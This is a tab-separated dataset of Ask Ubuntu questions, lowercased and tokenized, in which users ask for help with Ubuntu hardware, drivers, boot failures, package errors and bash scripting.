438244	mute button led blinks continuously	i upgraded to 13.10 recently . i 've found a problem right after i upgraded . my pc is hp pavilion dv7qt . the mute button led is continuously blinking no matter what you do . it does n't stop . why is that happening ? and fyi , the button is working is properly , by which i mean to say that it mutes and unmutes the sound properly , but it is blinking anyway . the same happens with the wireless button , `` while it is turned on '' . is this a hardware problem or kind of a bug ? i searched and tried to tweak it from $ /etc/modprobe/iwlwifi.conf , but i could n't do that .
438245	how do i run a pxe server ?	i 'm going to run several virtual machines with kvm virtualization . in order to install guest systems over pxe protocol , i am going to run a pxe server on my host machine ( i 'm not doing it wrong , am i ? ) how can i do that ?
438247	bash file comparison line by line with selected string	let us say i have two files a.txt , b.txt a.txt 87621 3bde ndf 87621 2dfg ndf 87621 cdef ndf 87621 abcd ndf b.txt 93291 abcd ndf 93291 2dfg ndf 93291 adbf ndf 93291 gdrg ndf my script should create a file , by matching column 2 of both the files and create a file with matching string in new file c.txt like below c.txt 2dfg abcd i tried several options , but not succeded , can you help !
438249	debconf got a corrupted perl script . how to reinstall it ?	i got some power issues at home and got a bunch of files in my computer corrupted . i could fix most of them , but one that 's bugging me is a debconf script . everytime i try to install something i get this : configuring php5-curl ( 5.4.9-ubuntu2.4 ) ... attempt to access disallowed key 'ďż˝png ' in a restricted hash at /usr/share/perl5/debconf/config.pm line 43 , < debconf_config > chunk 1. dpkg : error processing php5-curl ( -- configure ) : sub-process script post-installation returned error state code 255 i searched a little bit that script ( config.pm ) but found nothing strange , what makes me think it 's something it reads or includes - but my perl knowledge is null and i have no idea how to fix that manually . is it possible to reinstall debconf and make that work again ?
438251	wlan led off no matter the state of wireless on acer extensa 5220	i have an acer extensa 5220 . it 's really good with ubuntu 13.10 . wifi connects but wlan led does not work ( always off ) . with windows vista , i can see the led switches on & off .
438252	no control over usb mic input/output level , or other external devices while mic plugged in	i 'm running ubuntu 12.04 with a logitech c920 webcam and a brand new blue yeti usb mic . my intent was to run through all the input and output devices and settings while plugged in to my laptop , and have a comparison video between my laptop , webcam and usb mic sound quality . the problem , while i have the usb mic plugged in i have no control over input volume , or input device . in sound settings , under `` record sound from '' i switch from internal microphone , hd webcam microphone and yeti stereo microphone . although the input level meter reflects my tapping on each device as i change them , the actual audio is still only coming from the blue yeti mic . i put the blue yeti mic on mute , then select other input choices ( such as webcam mic ) and i get no input . also the usb mic is running really hot . i have the gain on the hardware down to 1 as well as input volume on sound settings set to very low , yet the audio is really hot . in guvcview , i have input as `` sysdefault '' ( there is no yeti option ) changing the input device on guvcview also has no affect on audio quality or actual source . in addition , i have the vu meter showing on my video screen display , and despite the fact that i have the input volume turned way down , the vu meter shows red for peaking . the only way i can get any input from my webcam mic , or laptop is by unplugging the usb mic . the bigger problem is that this usb mic is running really hot and sensitive . edit 1 : so i unplugged the usb mic , changed the input in sound settings to `` hd pro webcam c920 '' and changed the input volume slider to `` unamplified '' and have sysdefault selected as input device on guvcview , yet i still get a very hot signal ( if i change input from sysdefault to hd pro webcam in guvcview , i get no audio ) . so in sound settings , changing the input level slider seems to have no affect on actual input volume . it 's very loud and distorted regardless of input level settings . so with both the usb mic and the webcam mic , i am getting no control over input signal , and it 's very loud . edit 2 : i went into pulseaudio with editor : sudo gedit /etc/pulse/default.pa and scrolled down to : load-module module-udev-detect and added : tsched=0 to the end . so the line will look like : load-module module-udev-detect tsched=0 then i clicked save , and i rebooted system . i now have control over volume slider , and input levels . as well as i can now switch devices ( laptop mic , yeti mic , webcam mic ) while recording video . however , in guvcview , i have to have input selected as `` pulse '' , not yeti stereo mic or webcam mic . if i select any other input other than `` pulse '' , i will have no audio .
438253	i have installed youtube-dl but i can not find out how to use it	hello i have downloaded youtube-dl through the terminal but i can not use it . i ca n't even find the icon for it on my screen . help , please .
438254	ubuntu music @ android : 404	i have created an ubuntu one account today and bought some music . trying to log in this account with the android app on my motorola defy ( cyanogenmod 7.2 ) results in two error messages : '' credentials problem . please try again '' followed by : '' auth error : communiction with the service provider failed : service provider responded in error : 404 ( not found ) '' . i was n't able to even provide any credentials yet . is this a known problem ? any workarounds ? thanks..
438255	can not boot live cd on hp pavilion	i need your help ! i tried to boot ubuntu from my live cd but it 's not working on my hp laptop ( but it works on another fujitsu laptop ) . before it appeared booting , i got the messages from my camera could not open `` \efi\boot\fallback.efi '' : 14 error : variable 'root ' is n't set . after that , i got stopping gpu interrupts balancing daemon and loads of 'commands ' ( something i do n't understand at all ) then the screen goes black . it does n't appear booting anymore . please help !
438258	problem in booting ubuntu along side another ssd got ubuntu	hey guys i have the following problem : i have a usb 3 usb flash 240gb . when i try to boot it alongside kingston ssd 240gb i get the following error : http : //i.stack.imgur.com/uvprb.jpg but when i boot the kingston ssd it works fine . ata kingston sh103s3 = /dev/sda # ubuntu 13.10 the usb 3 flash mushkin ventura ultra = /dev/sdb # ubuntu 14.04 fdisk -l disk /dev/sda : 240.1 gb , 240057409536 bytes 255 heads , 63 sectors/track , 29185 cylinders , total 468862128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00014928 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 468860927 234179585 5 extended /dev/sda5 501760 468860927 234179584 8e linux lvm disk /dev/mapper/ubuntu -- vg-root : 214.4 gb , 214354100224 bytes 255 heads , 63 sectors/track , 26060 cylinders , total 418660352 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-root does n't contain a valid partition table disk /dev/mapper/ubuntu -- vg-swap_1 : 25.4 gb , 25442648064 bytes 255 heads , 63 sectors/track , 3093 cylinders , total 49692672 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu -- vg-swap_1 does n't contain a valid partition table disk /dev/sdb : 240.1 gb , 240057409536 bytes 255 heads , 63 sectors/track , 29185 cylinders , total 468862128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000dc461 device boot start end blocks id system /dev/sdb1 * 2048 499711 248832 83 linux /dev/sdb2 501758 468860927 234179585 5 extended /dev/sdb5 501760 468860927 234179584 8e linux lvm disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000672c1 device boot start end blocks id system /dev/sdc1 2048 1953521663 976759808 7 hpfs/ntfs/exfat /dev/sdc4 1559100768 1561017695 958464 0 empty
438260	installing gimp 2.8.8 from source	i am trying to install gimp 2.8.8 and this program has a lot of dependencies . i am trying to install all of them but now i am a bit overwhelmed . i am trying to install gegl-0.2.0 it gives me this error . checking for pkg-config ... ( cached ) /usr/local/bin/pkg-config checking pkg-config is at least version 0.16 ... yes checking for glib - version > = 2.28.0 ... *** 'pkg-config -- modversion glib-2.0 ' returned 2.38.2 , but glib ( 2.32.4 ) *** was found ! if pkg-config was correct , then it is best *** to remove the old version of glib . you may also be able to fix the error *** by modifying your ld_library_path enviroment variable , or by editing *** /etc/ld.so.conf . make sure you have run ldconfig if that is *** required on your system . *** if pkg-config was wrong , set the environment variable pkg_config_path *** to point to the correct configuration files no configure : error : *** glib 2.28.0 or better is required . the latest version of *** glib is always available from ftp : //ftp.gtk.org/ . * i do n't know what to do next . can someone help me ? if there is a simple way to install the latest gimp version i would like to know that too . i have tried to install some from the software center but the last version is 2.6 .
438264	zapdtg guest account ?	i 'm using ubuntu 13.10 where did guest account zapdtg with root privileges come from ? i ca n't gather much information , as this guest account has root privileges and being a brand new user , i do n't . is there a default root account created in the guest account file for all new users ? i know it has root privileges because when i try to move , delete , or any other file manipulation , it tells me that it has root privileges and i do n't have the proper permissions to change anything .
438265	how to slow down a pal video to ntsc ?	i have a video file that was ripped from a dvd that was converted from ntsc to pal . now , that file is faster and higher-pitched than it should be . how can i slow down this mp4 file ( both in video speed and pitch ) so that it is correct ? it currently is at 23.97 fps .
438266	my samsung ativ smart pc ( 500t ) wont install ubuntu	i 've been wanting to install ubuntu on my ativ smart pc because it 's really slow with windows , so i was hoping for a bit better speed with linux . the problem is that it simply wo n't let me install ubuntu . i 've tried a lot of different things , including trying to boot up a liveusb ( both x86 and x64 ) . it 's a windows 8 computer and i 've turned secure-boot off . this pc seems to hate anything other than windows booting , when i try to boot the liveusb it loads up but i get this error every single time : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : insert your windows installation disc and restart your computer . choose your language settings , then click `` next '' . click `` repair your computer '' . if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\mubildr.mbr status : 0xc000000f info : the application or operating system could n't be loaded because a required file is missing or containing errors it wo n't even let me boot up formatters so i could erase everything off the hdd , so i 'm really lost here . help ? ?
438273	older hp laptop with ubuntu on it wo n't connect to the internet ?	i recently put ubuntu on my older laptop and this is the first time i 've really used linux . it will let me connect to internet if i use ethernet but not wirelessly . how can i fix this ?
438274	how to run a script when password is entered at the lock screen ?	to toggle the enabling/disabling of my notebook 's touchpad according to connected usb mouse , i used touchpad-indicator , which runs a daemon to monitor connected devices and take appropriate action . when i send notebook to sleep and then unplug my mouse , on the wake up , the touchpad is disabled , so i have to connect-disconnect the mouse to enable it ! i 've searched this forum for the problem and both found solutions ( adding script in /etc/pm/sleep.d or /usr/lib/pm-utils/sleep.d ) did n't work ! i 've put up a question to solve it , but after all , even when re-worked using udev 's rules instead of touchpad-indicator , the problem still persists ! i want to clarify it : if touchpad was disabled on system level ( i. e. disabled before even logging in , and the script would lie in rc.local , which , however , i tried , and it did n't work ) , putting scripts in /etc/pm and usr/lib/pm-utils may work . but it is disabled on session level or whatever level does udev apply to . can you please tell me where to put scripts which will run when i enter the password ? not log-in , but enter password e.g . after wakeup . update : @ terdon you did n't quite get it . i do n't even have xscreensaver enabled , i doubt if it is even installed . you see , because my account has a password , if i press `` log out '' or `` change user '' or sleep mode , after that i will have to enter my password , and it has nothing to do with xscreensaver or any screensavers i do n't have them . i tried what you suggested before asking this question and it did n't work out . update 2 : ok , after some investigation i can tell that it 's a lubuntu specific problem . i am working now on `` befriending '' lightdm ( which i guess applies on some level other than udev ) and udev . anybody with any experience with lighdm is appreciated . update 3 : thanks to ubuntu wiki i ( correctly ? ) figured out where to put the call of my script . so i added session-setup-script=/home/n76/tptoggle.sh to /etc/lightdm/lightdm.conf the current situation is the same as in the beginning , except that lightdm is actually trying to put touchpad on when user session starts the problem is n't gone , but i feel that i 'm close and it 's just about giving lightdm the right privileges . please suggest how to do it .
438278	samsung 535u3c very slow	so here 's my problem : ubuntu on this notebook/ultra-book is just too slow ! i 'm now using uefi installation because with the standard one there was the power 's problem ( 100 % cpu usage on ac-in ) . i 'm waiting 14.04 release to update my machine but my question is why my computer is just so slow in many situations ( firefox open with some other applications , etc ) . the big problem is that windows is so fine ! so i 'm investigating to find those machines problem . ( just to now i hate windows and i 'm an ubuntu user since i was 15.. ) . here 's a screen of one of those strange situation.. doing nothing a my cpu is just like that : so please help not for me , but for the community . thank you all ! specs : amd a4-4355m ; 4gb ram ; radeon 7400g ;
438280	how to configure debian/rules file for packaging with cdbs and cmake , qt5 on ubuntu 12.04	this is the first time i ask here . recently i played packaging -- a new thing for me -- in launchpad . i tried compiling sigil 0.7.4 for ubuntu precise . the source code had to be compiled with qt5 , while by default precise only provide qt4 . so i used âubuntu sdk teamâ for the build dependencies . i did the local building with bzr in trusty and everything seems to work properly . but the build in the launchpad stuck with an error . have a look at the log . the debian/rules file contains : # ! /usr/bin/make -f # -*- makefile -*- include /usr/share/cdbs/1/rules/debhelper.mk include /usr/share/cdbs/1/class/cmake.mk deb_cmake_extra_flags += -dqt_qmake_executable=/usr/bin/qmake according to the build log , the parameter for cmake extra flags is working . but why it still gave an error ? where is qt5-qmake located , so that it stop giving error ? thanks in advanced . edit for those who have the same problem , you might have been googling around to solve . i give more details about the error : cmake warning at src/sigil/cmakelists.txt:38 ( find_package ) : by not providing `` findqt5.cmake '' in cmake_module_path this project has asked cmake to find a package configuration file provided by `` qt5 '' , but cmake did not find one . could not find a package configuration file provided by `` qt5 '' with any of the following names : qt5config.cmake qt5-config.cmake add the installation prefix of `` qt5 '' to cmake_prefix_path or set `` qt5_dir '' to a directory containing one of the above files . if `` qt5 '' provides a separate development package or sdk , be sure it has been installed . cmake error at src/sigil/cmakelists.txt:454 ( qt5_wrap_ui ) : unknown cmake command `` qt5_wrap_ui '' .
438281	adblock not working in chrome , recently upgrade to ubuntu 13.10	adblock is not blocking ads on youtube . if i move to another tab , the youtube screen goes black and i have to reload the page . i do n't know if this is an issue with 13.10 , but this just started happening since i upgraded . i was using ubuntu 10.04 and never had this issue . any help is appreciated , thanks .
438283	i 've lost my secuity password	i 've lost the main password to my computer and can only boot from c.d how do i reset it to access my computer from itself ?
438288	ubuntu ca n't detect wifi mac	i have installed ubuntu ( 12.04.1 lts ) on my mac air 6.1 , but it ca n't detect any wifi . i was told that i should install a network card driver . but i have tried to search on google but i got nothing . because i type : lspci -vvnn | grep 14e4 to detect the device and i got this : network controller [ 0280 ] : broadcom corporation device 14e4:43a0 i saw lots of things about broadcom bcm** but i think mine is different from the bcm** . can u help me ? what should i do ? thx in advance .
438289	just installed ubuntu 12.04 lts and have no internet	i just installed ubuntu 12.04 onto an old dell inspiron 1521 . i am unable to access the internet either by wireless or plugging the ethernet cable from the modem to the laptop . i 'm thinking i need to install drivers but i 'm not sure and do n't know how to do that with linux . first time using it . thank you
438292	did a partial update for 13.10	so today , my computer asked for an update and i figured yah i got time . so i did it and then it said some packages were not installed properly and would like to do a partial update . figured well that 's fine and did it . once i was done i rebooted and then boom a lot of stuff turned white and have alot graphical glitches and i cant see any picutures and it keeps asking for updates but i cant update it . not really sure what i can do about it . i just really regret doing that partial update . i am using a ativ book 8 with the 64-bit version of ubuntu 13.10 being dual-booted with windows 8.1 pro . output of sudo apt-get install -f : dx511 @ ativ : ~ $ sudo apt-get install -f [ sudo ] password for dx511 : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded .
438293	how do i get rid of 'could not write bytes : broken pipe ' everytime on shutdown ubuntu 12.04.4 lts ?	i 'm running the 32-bit version on a dual-boot xp laptop and every time i shut down ubuntu , i get this message on a black screen for about 1 second : '' could not write bytes : broken pipe * checking battery state . . . broadcast message from root @ billo-satellite-a105 ( unknown ) at 23:18 the system is going down for halt now ! checking for running unattended-upgrades : acpid : exiting speech-dispatcher disabled : edit /etc/default/speech-dispatcher '' i 'm a new ubuntu user , so i need detailed ( not generalized ) instructions on what to do . thanks in advance for your help ! !
438295	is it possible to `` semi-maximize left or right '' in lxde in any way ?	i mean like in unity when you drag a window and stick it to the `` right '' , it first shows a shadow covering the right half of the desktop and then the window would cover that half on mouse release . is it possible to do that on lxde ? not at all necessarily by dragging the window ; a keyboard shortcut would be great ! any way at all would be great .
438297	fan is constantly running in my laptop 13.10	i installed 13.10 on my laptop and it seems as if the fan is constantly running . this is on a sony vaio ultrabook , the fan keeps running even if the cpu load is low . this problem does not occur when running windows , it will turn itself on/off when needed . i have searched posts on this forum for the same problem but none of the solutions worked for me . edit : thank you , let me know if you need more information . pc info : http : //imgur.com/3xqxpgf *-display description : vga compatible controller product : haswell-ult integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:59 memory : f6400000-f67fffff memory : e0000000-efffffff ioport : f000 ( size=64 )
438299	ubuntu 12.04 boot time very slow	i am a bit new at analyzing the boot up sequence in linux , so i am seeking a bit of guidance . look the bootchart 's output . i am sitting pretty consistently at 1:25-1:30 for boot time , but i know i should be hovering closer to 30 seconds , based on past installs . and yes , i have checked many of the past questions and answers provided . but it seems that there is no singular advice that is useful to everyone . my sys specs : thinkpad t430 intel i5-3320m cpu @ 2.60ghz ă 4 8gb ram
438301	still can not install halo : combat evolved	i have been trying all week to install halo : combat evolved on my laptop . i 'm running ubuntu 12.04 64-bit and wine 1.6.2 . i insert the game disc into the disc drive and it loads . i start setup and enter my product key , but then it says can not load pidgen.dll . i looked on the forums and added pidgen.dll and mfc42.dll to .wine/drive_c/windows/system32 folders . it still says that it can not load pidgen.dll . i also tried playonlinux but halo is not listed in the program list . what else can i possibly do to get halo to install , or is it just a lost cause ?
438302	modem advan jetz dt-08 tanpa terminal	mas , mau tanya nih . gimana ya caranya koneksi modem advan dt-08 yang tidak pake terminal ? masalahnya ada temen ane yang punya dan cenderung tidak menyukai terminal ( gui method preferred ) . thanks atas perhatian dan bantuan mas ...
438307	kernel editing of my boot loader ?	my i686 with server 12.04 386 boots to a black screen . i read a post that said i need to edit the kernel of the boot loader . the installation went smooth except for the black boot screen . how do i go about this , as i am lost and awash with information overload .
438311	no sound meter in panel	my sound did not work originally ... as stated here weird sound issues however , randomly it started to work now : ) how do i get the sound meter on the taskbar ? right clicking does not do anything there .
438312	`` ls '' with one-digit pattern gives me strange results	i 'm running ubuntu as vm in vmware fusion on macpro : ayakovlev @ ubuntu : ~ $ uname -a linux ubuntu 3.11.10.3 # 1 smp thu mar 6 15:31:54 est 2014 x86_64 x86_64 x86_64 gnu/linux the command below outputs result which i expect : ayakovlev @ ubuntu : ~ $ ls /usr/include/*5* ax25.h when i replace 5 by 6 i get very strange results : ayakovlev @ ubuntu : ~ $ ls /usr/include/*6* a.out.h asm bits c++ fpu_control.h gnu ieee754.h sys zconf.h what might be a reason for that ?
438313	ubuntu on amd laptop : can not boot	specs of my laptop are : processor : amd e1-2500 graphics : radeon hd 8240 . whenever i try to install linux in it , it gives some errors . in ubuntu 's case , it does not boot , and the screen just goes black ( when i change to uefi boot , it goes white ) . in opensuse 's case , it freezed but i was able to look at terminal output and it said that it detected some cpu lockup . i have had fedora on the same laptop for some time until an update messed it up and it again gave cpu lockup error , so i am guessing ubuntu has the same problem . my guess is that new kernels have that issue with my processor , since i do n't think i have hardware problems , as i run windows without any issue ( also i was running fedora before some update ) . how can i solve this problem ?
438315	can not load eclipse .tar.gz file	i have just downloaded eclipse but i have trouble with while loading ( opening ) the .tar.gz file . could you please help me ? thank you . gzip : stdin : unexpected end of file tar : unexpected eof in archive tar : error is not recoverable : exiting now i also tried opening the eclipse .tar.gz file with archive manager . but i have trouble with opening it , so that i can not extract and set up eclipse .
438318	how do i manage what workspace specific applications open in ?	i am new to ubuntu and am loving it ! i would really like to take full advantage of workspaces . i would like to have a workspace for all of one type and one for all of another type and so on . but the annoyance i have encountered is when i open an app it will start in my active workspace , not the one i want it assigned or pined to per say . i am running ubuntu 13.10 . help ? thanks in advance , joe
438319	lightdm.conf is empty : what do i do ?	i am trying to become a superuser . i am following these steps : terminal code : sudo passwd root enter my user password create root account password retype root account password terminal code : sudo gedit /etc/lightdm/lightdm.conf text file opens , named lightdm.conf enter greeter-show-manual-login=true at bottom of text save , close , restart pc but when i go to open the text file , it is blank , and i am pretty sure that it 's not supposed to be . also , in the terminal i am getting this line : ( gedit:17559 ) : warning : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found and ( gedit:17559 ) : gtk-warning : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files is this right ? is the text file supposed to be ? if not , how do i restore it ?
438321	bash script difficulty	i 'm creating a bash script and i want to create a m e n u. i am a beginner and still a noob but appreciate all your help ! when i run the code it displays the menu but the problem is when the user enters a choice it keeps re-printing the menu to ask again and again no matter what choice was selected . # ! /bin/bash declare -i choice=1 ; while ( ( choice ! =5 ) ) do echo `` main menu : '' echo -e `` \t ( a ) add '' echo -e `` \t ( b ) remove '' echo -e `` \t ( c ) seach '' echo -e `` \t ( d ) display '' echo -e `` \t ( e ) exit '' echo -n `` please enter your choice : '' read choice case $ choice in `` a '' | '' a '' ) echo `` you entered a '' ; ; `` b '' | '' b '' ) echo `` you entered b '' ; ; `` c '' | '' c '' ) echo `` you entered c '' ; ; `` d '' | '' d '' ) echo `` you entered d '' ; ; `` e '' | '' e '' ) echo `` you entered e '' ( ( choice=5 ) ) ; ; * ) echo `` invalid answer '' ; ; esac done
438324	xbox 360 usb controller not detected	how do i get an xbox 360 controller working ? the tutorial i followed . controller worked fine for zsnes and the first few times with this program , but now when i plug in my controller the all four leds just flash annoyingly and nothing else happens . please help .
438328	fan noise clevo p150sm	i have a clevo p150sm and i installed ubuntu 13.10 and everything is working great ( wirlees amd drivers , even teh keyboard leds ) . but i have a problem the computer has the fans alway on and that makes a lot of noise . is there a way to controll this in ubuntu ? i just need it to be able to be watchin a movie at night withou the noise , so scaling the cpu frew is ok .
438331	alarm clock music problem	i 'm new to ubuntu ( currently using 12.04 lts ) and while using alarm clock and try to put music to wake me up , i get something like gstreamer is missing a plugin and this really bothers me ... anyway , an answer would be really appreciated ! thanks in advance .
438333	switching from java 6 jdk to java 7 jdk ... now showing for update-alternatives	alright so i 'm not sure if i 'm just stupid or what but i installed java 7 jdk by doing sudo apt-get install openjdk-7-jdk and then i try to do sudo update-alternatives -- config java and it only lists openjdk-6 under the choices ... its ' also weird since i see java 7 when i do -- config javac any help ?
438334	upgrading lubuntu ?	i have a copy of lubuntu ( the `` light '' distribution of ubuntu ) on one of my machines . i received a message that the version that i have is no longer supported and that i must upgrade . when i pressed okay to start upgrading the message box mentioned referenced a newer version of ubuntu . i was surprised that this did not mention a that there was a new version of lubuntu . i decided to press okay and see what happens . nothing happened . the software would not upgrade to either lubuntu or ubuntu . question : how do i upgrade lubuntu ? or am i stuck having to reinstall for each new version ?
438336	error on dpkg -l command result	my dpkg -l * gives me this result : package `20140123_002246.mp4 ' is not installed . package `20140123_002246.mpg ' is not installed . package `anu ' is not installed . package `anu.cpp ' is not installed . package `anu.sh ' is not installed . package `anu.zip ' is not installed . package `aplikasi ' is not installed . package `aplikasi.tar.gz ' is not installed . package `archives.tar.gz ' is not installed . package `compizconfig.png ' is not installed . dpkg-query : error : package name in specifier 'daurah tegar di atas sunnah di masa fitnah - al ustadz muhammad umar as sewed - sesi 1.mp3 ' is illegal : character ` ' not allowed ( only letters , digits and characters `-+._ ' ) it is abnormal . i do n't know how this could be happended . how to fix this ? thank you . ps : as a comparison , my normal dpkg -l result is something like this : / . /usr /usr/share /usr/share/doc /usr/share/doc/dhcp3-server /usr/share/doc/dhcp3-server/copyright /usr/share/doc/dhcp3-server/readme.debian /usr/share/doc/dhcp3-server/changelog.debian.gz
438337	why wo n't virtualbox work ?	i want to run virtualbox so that i can use windows vista , but this is what pops up when i start it . kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing /etc/init.d/vboxdrv setup as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . i do n't know what it means , but i know i have to install something but do n't know what to do .
438339	cudaminer - fail to compile due to nvcc and second error . : d	sarcastic @ twitpc : ~/cudam $ make make all-recursive make [ 1 ] : entering directory `/home/sarcastic/cudam' making all in compat make [ 2 ] : entering directory `/home/sarcastic/cudam/compat' making all in jansson make [ 3 ] : entering directory `/home/sarcastic/cudam/compat/jansson' make [ 3 ] : nothing to be done for `all ' . make [ 3 ] : leaving directory `/home/sarcastic/cudam/compat/jansson' make [ 3 ] : entering directory `/home/sarcastic/cudam/compat' make [ 3 ] : nothing to be done for `all-am ' . make [ 3 ] : leaving directory `/home/sarcastic/cudam/compat' make [ 2 ] : leaving directory `/home/sarcastic/cudam/compat' make [ 2 ] : entering directory `/home/sarcastic/cudam' nvcc -g -o2 -xptxas `` -abi=no -v '' -arch=compute_10 -- maxrregcount=64 -- ptxas-options=-v -i./compat/jansson -o salsa_kernel.o -c salsa_kernel.cu /bin/bash : nvcc : command not found make [ 2 ] : *** [ salsa_kernel.o ] error 127 make [ 2 ] : leaving directory `/home/sarcastic/cudam' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/sarcastic/cudam' make : *** [ all ] error 2 sarcastic @ twitpc : ~/cudam $ i 'm a newbie please help ! : d
438343	ubuntu partitions	what would be the appropiate way to partition my hard disk after installing ubuntu ? already know about booting from usb or live cd . what i mean is : what has to be done in gparted to get a `` healthy '' partition process . how many partitions should be made ? how should they be configured ? etc .
438345	how to remove/install a package that is not fully installed ?	i went to install bsnes the other day and for whatever reason the installation failed . now , i can not update , install new packages , or do basically any apt-get commands as they all try to process this broken package and fail . attempting to install a new package also just dooms it to the same fate . the error i get is : setting up google-chrome-stable ( 33.0.1750.152-1 ) ... /var/lib/dpkg/info/google-chrome-stable.postinst : 124 : /var/lib/dpkg/info/google-chrome-stable.postinst : update-alternatives : not found dpkg : error processing google-chrome-stable ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up bsnes ( 0.088-7 ) ... /var/lib/dpkg/info/bsnes.postinst : 5 : /var/lib/dpkg/info/bsnes.postinst : update-alternatives : not found dpkg : error processing bsnes ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : google-chrome-stable bsnes e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have been searching on google and here on ask ubuntu but have not found a working solution . the commonly suggested fix is to run the following : sudo apt-get clean & & sudo apt-get autoremove sudo apt-get -f install sudo dpkg -- configure -a this however does not work . the apt-get commands all fail with the same error as above and the dpkg command just does n't help . the other thing they often suggest to purge it via synaptic or the command line , which also fails . thanks for the help
438348	the intel linux driver installer 1.0.4 error : update from unauthenticated sites . how do i fix that ?	i saw this article and downloaded it http : //www.omgubuntu.co.uk/2014/03/intel-linux-driver-installer-1-0-4 then i performed the update and rebooted . after that the software updating gave me a list of updates , but stopped me cold because they were from unauthenticated sources . screenshot below : https : //www.dropbox.com/s/dk3dp7s410k32yu/screenshot % 20from % 202014-03-23 % 2021 % 3a40 % 3a39.png what do i do ?
438349	ubuntu touch for motorola droid maxx	hey i know that this question has been asked before and was claimed to be answered already but i could n't find the answer so i brought it upon myself to either ask someone to post the answer or at least a link to the answer for this question but will has anyone been creating a port of ubuntu touch to work on the new droid maxx ( which is different then the droid razr maxx ) . can somebody please answer this or post a link to the answer ? it would be greatly appreciated . thanks ! -damien
438350	android avd not starting	i hope someone will be able to help me with this issue . i am running : ubuntu 13.10 eclipse kepler sr2 i installed android sdk but when i go to android virtual device manager , i tried adding a new avd ( as well as selecting one from the list of predefined ones in `` device definitions '' tab ) for nexus 5 . avd is saved and has greed check mark ( valid avd ) . but when i start it , the progress bar moves and when done , nothing happens . the message below says this : starting emulator for avd 'avd_for_nexus_5_by_google' panic : could not open : avd_for_nexus_5_by_google please help resolve this . i am new to linux , so please elaborate . much much appreciated ,
438354	sudo command broken	i upgraded my dedicated server from ubuntu 11.1 to ubuntu 12.04 . after the server upgrade says 'unable to initialize pam : no such file or directory ' when i am going to change the user to sudo . i got this solution which is saying to make the /etc/pam.d/common-session-noninteractive file manually . but this thing can not be done as i do not have the permission to change the super user . can any one help on this .
438358	ubuntu ( 12.04 ) , icecast2 & airtime problem	first of all , i 'm a little noobish with ubuntu ( a little lot ; ) ) i 'm just setting up the last details to set up my radio but after i start it up and start to work with the airtime logged , after sometime it just `` disconnect '' aparently from internet i 'm using a static ip address wired to this notebook than actualy is working now like a server i think maybe the problem is when it suspend the screen off , the server aparenlty just do n't turn off but the services just disconnect from the network even when the server is still connected to the internet . any ideas of what could it be ? any ideas of how to fix it ? thanks in advance ps : if you think than you need more info , just let me a question and i answer it and edit this post
438361	compiz locking me out of other windows	when i am looking at one window , say a firefox window , i ca n't click out of it , even when i can see another window on the screen . that is , compiz does not only not focus on the other window , i can not close/minimize/maximize/drag the other window , and i can not click any buttons on that window . if i kill firefox , ( i can still access and type in my guake terminal for some reason , so i used killall firefox ) , then i can interact with the next window ( say , a nautilus window or something ) , but the others are still locked . i do n't know what caused this ; i have not messed with the settings since long before this happened . i have not installed anything recently . restarting has n't fixed the problem . if i can just trash the right config file and reset to the defaults or something , i would be happy . so far , i tried : metacity -- replace & the problem seems to persist in metacity . i also tried compiz -- replace & compiz -- reset & with no luck . next , i tried : rm -rf ~/.compiz-1 ~/.config/compiz-1 ~/.config/dconf/ ~/.gconf/ and then a restart with no luck . i 'm really stuck here . any more help would be greatly appreciated . i am using vanilla ubuntu 12.04
438362	hdmi not acting right	the hdmi on my gateway ne56r31u acts funny . it will show the splash screen onto a tv but that is it . it does n't show the mouse and it does n't show the video that i am playing through vlc . it seems to be stuck on the background . when i try to shut it down the shutdown window shows up on the tv and not the laptop monitor . fortunately i can use the directional keys to shutdown . it is a mess ... may the force be with you ! !
438364	problem in installing ubuntu 12.04 64 bit	i have downloaded the link provided in home page of ubuntu i.e. , 12.04 for desktop ubuntu . i got downloaded a file which of size 733 mb in iso format and then i extract files from the iso image and then i click on the wubi and it re-directed me into a link and took me an 30 mins or so . after completing the download , installation came to halt throwing some log error . it happened 2 times for me . is there anything problem with my process with my installation process or is there any other process for installing ? currently i 'm using windows 8 and i 'm trying to install ubuntu from windows 8 . help me with this problem . thanks in advance .
